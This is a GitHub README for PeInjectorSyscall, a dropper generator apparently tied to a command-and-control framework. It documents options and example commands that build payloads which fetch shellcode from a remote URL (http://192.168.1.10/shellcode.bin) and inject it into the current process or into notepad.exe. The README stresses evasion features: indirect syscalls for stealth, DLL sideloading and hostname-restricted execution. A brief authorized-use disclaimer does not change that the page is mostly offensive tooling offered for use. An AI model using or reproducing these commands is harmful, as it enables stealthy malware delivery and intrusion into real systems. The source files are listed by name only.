PeInjectorSyscall

PeInjectorSyscall is a Python-based dropper generator that creates payloads capable of injecting shellcode using indirect syscalls. It supports both self-injection and remote process injection, with shellcode sourced from a URL or generated using Donut.

This dropper is integrated as a module in the Exploration C2 framework.

Features

Shellcode injection using indirect syscalls for stealth
Self-injection or remote process injection
Shellcode fetched from remote URLs or generated from executables
Supports DLL sideloading using export metadata
Hostname-based execution restriction

Usage

PeInjectorSyscall.py [options]

Options

-h, --help Show this help message and exit.
-p, --process <name/self> Target process to inject the shellcode into. Use "self" to inject into the current process.
-u, --url <url> URL to fetch the shellcode from (e.g., http://server/shellcode.bin).
-b, --binary <path> Path to a binary file that will be converted into shellcode using Donut.
-a, --args <arguments> Command-line arguments to pass to the binary during shellcode creation.
-r, --rawShellcode <path> Use a raw shellcode file instead of generating one with Donut.
-t, --targetHost <hostname> Restrict the dropper to run only on the specified host (hostname match).
-s, --sideDll <path> Path to a DLL used to extract export table and metadata to create a side-loadable DLL.
-d, --SideDllPathOnHostSystem <path> Path where the original DLL resides on the host system for DLL sideloading.

Examples

# Generate a dropper that injects into itself using shellcode from a URL
PeInjectorSyscall.py -p self -u http://192.168.1.10/shellcode.bin

# Generate a dropper that injects into notepad.exe using shellcode from a binary
PeInjectorSyscall.py -p notepad.exe -b ./calc.exe

# Generate a dropper that only runs on a specific host and uses DLL sideloading
PeInjectorSyscall.py -p self -r ./payload.raw -t TARGET-HOST -s ./template.dll -d C:\Windows\System32\template.dll

Notes

Either --binary or --rawShellcode must be provided, but not both.
DLL sideloading is optional but allows for stealthier deployments.
The Donut tool must be available if using --binary to generate shellcode.

Disclaimer

This tool is intended for authorized security assessments and research only. Unauthorized use is strictly prohibited.

Name		Name	Last commit message	Last commit date
Latest commit History 22 Commits
bin		bin
ressources		ressources
.gitignore		.gitignore
LICENSE		LICENSE
PEstructs.h		PEstructs.h
PeInjectorSyscall.py		PeInjectorSyscall.py
README.md		README.md
compile.bat		compile.bat
compile.sh		compile.sh
helpers.cpp		helpers.cpp
helpers.h		helpers.h
implant.cpp		implant.cpp
implant.hpp		implant.hpp
include.hpp		include.hpp
inject-asm.x64.asm		inject-asm.x64.asm
inject-asm.x64.obj		inject-asm.x64.obj
inject-asm.x64.s		inject-asm.x64.s
templateDef		templateDef

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Repository files navigation

PeInjectorSyscall

Features

Usage

Options

Examples

Notes

Disclaimer

About

Uh oh!

Releases

Packages

Uh oh!

Languages

License

maxDcb/PeInjectorSyscall

Folders and files

Latest commit

History

Repository files navigation

PeInjectorSyscall

Features

Usage

Options

Examples

Notes

Disclaimer

About

Topics

Resources

License

Uh oh!

Stars

Watchers

Forks

Releases

Packages 0

Uh oh!

Languages

Packages